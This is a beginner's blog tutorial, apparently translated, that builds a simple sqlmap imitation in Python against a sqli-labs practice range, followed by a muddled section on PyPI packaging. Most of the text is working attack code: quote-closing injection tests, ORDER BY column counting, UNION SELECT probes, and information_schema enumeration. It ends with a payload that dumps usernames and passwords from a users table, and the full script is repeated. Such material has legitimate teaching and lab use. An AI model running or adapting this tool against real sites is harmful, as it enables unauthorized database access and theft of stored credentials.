
Cybersecurity for Beginners: Building a Simple sqlmap


Background

I have been studying network security for a while now. Having grown used to tools written by other people, I decided to write a simple, entry-level tool of my own to practice with.

Demo

Spin up a sqli-labs range as the test site and grab its URL: https://96e2b87c-897e-3af7-bdc1-fdfea8bde004-1.anquanlong.com/Less-1/index.php?id=1 Then run the program.
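The post doesn't show the launch line itself; a minimal sketch, assuming the full script below is saved as imitate_sqlmap.py:

from imitate_sqlmap import sqlmap

# Point the tool at the injectable id parameter of the sqli-labs target.
sqlmap('https://96e2b87c-897e-3af7-bdc1-fdfea8bde004-1.anquanlong.com/Less-1/index.php?id=1')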

Code Walkthrough

First, check whether the site is vulnerable to SQL injection by closing single and double quotes and comparing boolean conditions:
def can_inject(text_url):
    # try closing a single quote (%27) and then a double quote (%22)
    text_list = ["%27", "%22"]
    for item in text_list:
        target_url1 = text_url + str(item) + "%20" + "and%201=1%20--+"
        target_url2 = text_url + str(item) + "%20" + "and%201=2%20--+"
        result1 = send_request(target_url1)
        result2 = send_request(target_url2)
        soup1 = BeautifulSoup(result1, 'html.parser')
        fonts1 = soup1.find_all('font')
        content1 = str(fonts1[2].text)  # sqli-labs prints its output in the third <font> tag
        soup2 = BeautifulSoup(result2, 'html.parser')
        fonts2 = soup2.find_all('font')
        content2 = str(fonts2[2].text)
        # "and 1=1" should render the normal page while "and 1=2" renders nothing
        if content1.find('Login') != -1 and content2.strip() == '':
            log('Vulnerability found using ' + item)
            return True, item
        else:
            log('No vulnerability found using ' + item)
    return False, None
If a SQL injection vulnerability is detected, use ORDER BY to find the number of columns:
def text_order_by(url, symbol):
    flag = 0
    for i in range(1, 100):
        log('Testing column ' + str(i))
        text_url = url + symbol + "%20order%20by%20" + str(i) + "--+"
        result = send_request(text_url)
        soup = BeautifulSoup(result, 'html.parser')
        fonts = soup.find_all('font')
        content = str(fonts[2].text)
        # the first ORDER BY index that breaks the page is one past the real column count
        if content.find('Login') == -1:
            log('Column count found -> ' + str(i))
            flag = i
            break
    return flag
With the column count in hand, use a UNION SELECT query to find which column positions are echoed back into the page:
def text_union_select(url, symbol, flag):
    prefix_url = get_prefix_url(url)
    # id=0 returns an empty result set, so the page displays the UNION row instead
    text_url = prefix_url + "=0" + symbol + "%20union%20select%20"
    for i in range(1, flag):
        if i == flag - 1:
            text_url += str(i) + "%20--+"
        else:
            text_url += str(i) + ","
    result = send_request(text_url)
    soup = BeautifulSoup(result, 'html.parser')
    fonts = soup.find_all('font')
    content = str(fonts[2].text)
    for i in range(1, flag):
        # a placeholder number visible in the page marks an echoed column
        if content.find(str(i)) != -1:
            temp_list = content.split(str(i))
            return i, temp_list
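For a three-column target like Less-1, the request built above decodes to roughly the following (illustrative):

index.php?id=0' union select 1,2,3 --+

Whichever placeholder number shows up in the rendered page marks an echoed column, and the text on either side of it (saved as temp_list) is what the later functions use to cut query results out of the HTML.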
Identify the DBMS by sending a malformed request and checking the resulting error page for the database name:
def get_database(url, symbol):
    # append garbage after the closing quote to force a database error;
    # the error message reveals which DBMS is running
    text_url = url + symbol + "aaaaaaaaa"
    result = send_request(text_url)
    if result.find('MySQL') != -1:
        return "MySQL"
    elif result.find('Oracle') != -1:
        return "Oracle"
    return "Unknown"  # added so callers never receive None
Get the table names:
def get_tables(url, symbol, flag, index, temp_list):
    prefix_url = get_prefix_url(url)
    text_url = prefix_url + "=0" + symbol + "%20union%20select%20"
    for i in range(1, flag):
        if i == index:
            # place group_concat(table_name) in the echoed column
            text_url += "group_concat(table_name)" + ","
        elif i == flag - 1:
            text_url += str(i) + "%20from%20information_schema.tables%20where%20table_schema=database()%20--+"
        else:
            text_url += str(i) + ","
    result = send_request(text_url)
    soup = BeautifulSoup(result, 'html.parser')
    fonts = soup.find_all('font')
    content = str(fonts[2].text)
    # cut the payload output out of the page using the surrounding text
    return content.split(temp_list[0])[1].split(temp_list[1])[0]
Get the column names:
def get_columns(url, symbol, flag, index, temp_list):
    prefix_url = get_prefix_url(url)
    text_url = prefix_url + "=0" + symbol + "%20union%20select%20"
    for i in range(1, flag):
        if i == index:
            text_url += "group_concat(column_name)" + ","
        elif i == flag - 1:
            # the table name is hard-coded to the sqli-labs 'users' table
            text_url += str(i) + "%20from%20information_schema.columns%20where%20" \
                        "table_name='users'%20and%20table_schema=database()%20--+"
        else:
            text_url += str(i) + ','
    result = send_request(text_url)
    soup = BeautifulSoup(result, 'html.parser')
    fonts = soup.find_all('font')
    content = str(fonts[2].text)
    return content.split(temp_list[0])[1].split(temp_list[1])[0]
Get the row data:
def get_data(url, symbol, flag, index, temp_list):
    prefix_url = get_prefix_url(url)
    text_url = prefix_url + "=0" + symbol + "%20union%20select%20"
    for i in range(1, flag):
        if i == index:
            # 0x3a is ':' -- join id, username and password with colons
            text_url += "group_concat(id,0x3a,username,0x3a,password)" + ","
        elif i == flag - 1:
            text_url += str(i) + '%20from%20users%20--+'
        else:
            text_url += str(i) + ","
    result = send_request(text_url)
    soup = BeautifulSoup(result, 'html.parser')
    fonts = soup.find_all('font')
    content = str(fonts[2].text)
    return content.split(temp_list[0])[1].split(temp_list[1])[0]
Finally, split the dumped records and print each one at the output position:
datas = get_data(url, symbol, flag, index, temp_list).split(',')
temp = columns.split(',')
print('%-12s%-12s%-12s' % (temp[0], temp[1], temp[2]))
for data in datas:
    temp = data.split(':')
    print('%-12s%-12s%-12s' % (temp[0], temp[1], temp[2]))

Full Code

### imitate_sqlmap.py
import time

import requests
from bs4 import BeautifulSoup


def log(content):
    # timestamped console output, e.g. [21:24:03]message
    this_time = time.strftime('%H:%M:%S', time.localtime(time.time()))
    print("[" + str(this_time) + "]" + content)


def send_request(url):
    res = requests.get(url)
    result = str(res.text)
    return result


def can_inject(text_url):
    # try closing a single quote (%27) and then a double quote (%22)
    text_list = ["%27", "%22"]
    for item in text_list:
        target_url1 = text_url + str(item) + "%20" + "and%201=1%20--+"
        target_url2 = text_url + str(item) + "%20" + "and%201=2%20--+"
        result1 = send_request(target_url1)
        result2 = send_request(target_url2)
        soup1 = BeautifulSoup(result1, 'html.parser')
        fonts1 = soup1.find_all('font')
        content1 = str(fonts1[2].text)  # sqli-labs prints its output in the third <font> tag
        soup2 = BeautifulSoup(result2, 'html.parser')
        fonts2 = soup2.find_all('font')
        content2 = str(fonts2[2].text)
        if content1.find('Login') != -1 and content2.strip() == '':
            log('Vulnerability found using ' + item)
            return True, item
        else:
            log('No vulnerability found using ' + item)
    return False, None


def text_order_by(url, symbol):
    flag = 0
    for i in range(1, 100):
        log('Testing column ' + str(i))
        text_url = url + symbol + "%20order%20by%20" + str(i) + "--+"
        result = send_request(text_url)
        soup = BeautifulSoup(result, 'html.parser')
        fonts = soup.find_all('font')
        content = str(fonts[2].text)
        if content.find('Login') == -1:
            log('Column count found -> ' + str(i))
            flag = i
            break
    return flag


def get_prefix_url(url):
    # drop the value after the last '=' so a new one can be appended
    splits = url.split('=')
    splits.remove(splits[-1])
    prefix_url = ''
    for item in splits:
        prefix_url += str(item)
    return prefix_url


def text_union_select(url, symbol, flag):
    prefix_url = get_prefix_url(url)
    text_url = prefix_url + "=0" + symbol + "%20union%20select%20"
    for i in range(1, flag):
        if i == flag - 1:
            text_url += str(i) + "%20--+"
        else:
            text_url += str(i) + ","
    result = send_request(text_url)
    soup = BeautifulSoup(result, 'html.parser')
    fonts = soup.find_all('font')
    content = str(fonts[2].text)
    for i in range(1, flag):
        if content.find(str(i)) != -1:
            temp_list = content.split(str(i))
            return i, temp_list


def exec_function(url, symbol, flag, index, temp_list, function):
    # run an arbitrary SQL function such as version() in the echoed column
    prefix_url = get_prefix_url(url)
    text_url = prefix_url + "=0" + symbol + "%20union%20select%20"
    for i in range(1, flag):
        if i == index:
            text_url += function + ","
        elif i == flag - 1:
            text_url += str(i) + "%20--+"
        else:
            text_url += str(i) + ","
    result = send_request(text_url)
    soup = BeautifulSoup(result, 'html.parser')
    fonts = soup.find_all('font')
    content = str(fonts[2].text)
    return content.split(temp_list[0])[1].split(temp_list[1])[0]


def get_database(url, symbol):
    text_url = url + symbol + "aaaaaaaaa"
    result = send_request(text_url)
    if result.find('MySQL') != -1:
        return "MySQL"
    elif result.find('Oracle') != -1:
        return "Oracle"
    return "Unknown"


def get_tables(url, symbol, flag, index, temp_list):
    prefix_url = get_prefix_url(url)
    text_url = prefix_url + "=0" + symbol + "%20union%20select%20"
    for i in range(1, flag):
        if i == index:
            text_url += "group_concat(table_name)" + ","
        elif i == flag - 1:
            text_url += str(i) + "%20from%20information_schema.tables%20where%20table_schema=database()%20--+"
        else:
            text_url += str(i) + ","
    result = send_request(text_url)
    soup = BeautifulSoup(result, 'html.parser')
    fonts = soup.find_all('font')
    content = str(fonts[2].text)
    return content.split(temp_list[0])[1].split(temp_list[1])[0]


def get_columns(url, symbol, flag, index, temp_list):
    prefix_url = get_prefix_url(url)
    text_url = prefix_url + "=0" + symbol + "%20union%20select%20"
    for i in range(1, flag):
        if i == index:
            text_url += "group_concat(column_name)" + ","
        elif i == flag - 1:
            text_url += str(i) + "%20from%20information_schema.columns%20where%20" \
                        "table_name='users'%20and%20table_schema=database()%20--+"
        else:
            text_url += str(i) + ','
    result = send_request(text_url)
    soup = BeautifulSoup(result, 'html.parser')
    fonts = soup.find_all('font')
    content = str(fonts[2].text)
    return content.split(temp_list[0])[1].split(temp_list[1])[0]


def get_data(url, symbol, flag, index, temp_list):
    prefix_url = get_prefix_url(url)
    text_url = prefix_url + "=0" + symbol + "%20union%20select%20"
    for i in range(1, flag):
        if i == index:
            text_url += "group_concat(id,0x3a,username,0x3a,password)" + ","
        elif i == flag - 1:
            text_url += str(i) + '%20from%20users%20--+'
        else:
            text_url += str(i) + ","
    result = send_request(text_url)
    soup = BeautifulSoup(result, 'html.parser')
    fonts = soup.find_all('font')
    content = str(fonts[2].text)
    return content.split(temp_list[0])[1].split(temp_list[1])[0]


def sqlmap(url):
    log('Welcome to the SQL injection tool')
    log('Starting SQL injection test')
    result, symbol = can_inject(url)
    if not result:
        log('No SQL injection vulnerability found, exiting')
        return False
    log('SQL injection vulnerability found, please wait')
    flag = text_order_by(url, symbol)
    index, temp_list = text_union_select(url, symbol, flag)
    database = get_database(url, symbol)
    version = exec_function(url, symbol, flag, index, temp_list, 'version()')
    this_database = exec_function(url, symbol, flag, index, temp_list, 'database()')
    log('Current DBMS -> ' + database.strip() + ' ' + version.strip())
    log('Database name -> ' + this_database.strip())
    tables = get_tables(url, symbol, flag, index, temp_list)
    log('Tables -> ' + tables.strip())
    columns = get_columns(url, symbol, flag, index, temp_list)
    log('Columns -> ' + columns.strip())
    log('Dumping all rows...')
    datas = get_data(url, symbol, flag, index, temp_list).split(',')
    temp = columns.split(',')
    print('%-12s%-12s%-12s' % (temp[0], temp[1], temp[2]))
    for data in datas:
        temp = data.split(':')
        print('%-12s%-12s%-12s' % (temp[0], temp[1], temp[2]))

Packaging as an Executable for PyPI

Simply add the entry_points argument in the cfg file.
The entry_points argument declares an interface that imitate_sqlmap registers through setuptools, so that external code can call it directly.
Register the entry_points in imitate_sqlmap's setup.py as follows:

setup(
    name='imitate_sqlmap',
    entry_points={
        'imitate_sqlmap.api.sqlmap': [
            'databases = imitate_sqlmap.api.sqlmap.databases:main',
        ],
    },
)
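The cfg file mentioned above is the declarative equivalent of this setup() call. A minimal setup.cfg sketch (hypothetical: it assumes the package exposes a main() function, and it uses console_scripts, the standard group that setuptools turns into command-line executables):

[metadata]
name = imitate_sqlmap

[options.entry_points]
console_scripts =
    imitate-sqlmap = imitate_sqlmap:main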

This setup() call registers an entry point belonging to the imitate_sqlmap.api.sqlmap group. Note that if several other packages also register entry points under imitate_sqlmap.api.sqlmap, then looking up imitate_sqlmap.api.sqlmap will return every entry point registered in that group.
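As an illustration of that group lookup, a short sketch using the standard library's importlib.metadata (the group= keyword form requires Python 3.10 or newer):

from importlib.metadata import entry_points

# Collects every entry point registered under this group by any installed
# distribution, not only the ones that imitate_sqlmap itself registered.
for ep in entry_points(group='imitate_sqlmap.api.sqlmap'):
    print(ep.name, '->', ep.value)
    handler = ep.load()  # imports the module and returns the target callable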

Finally, I hope you can give me a little follow.

With my sincere love.
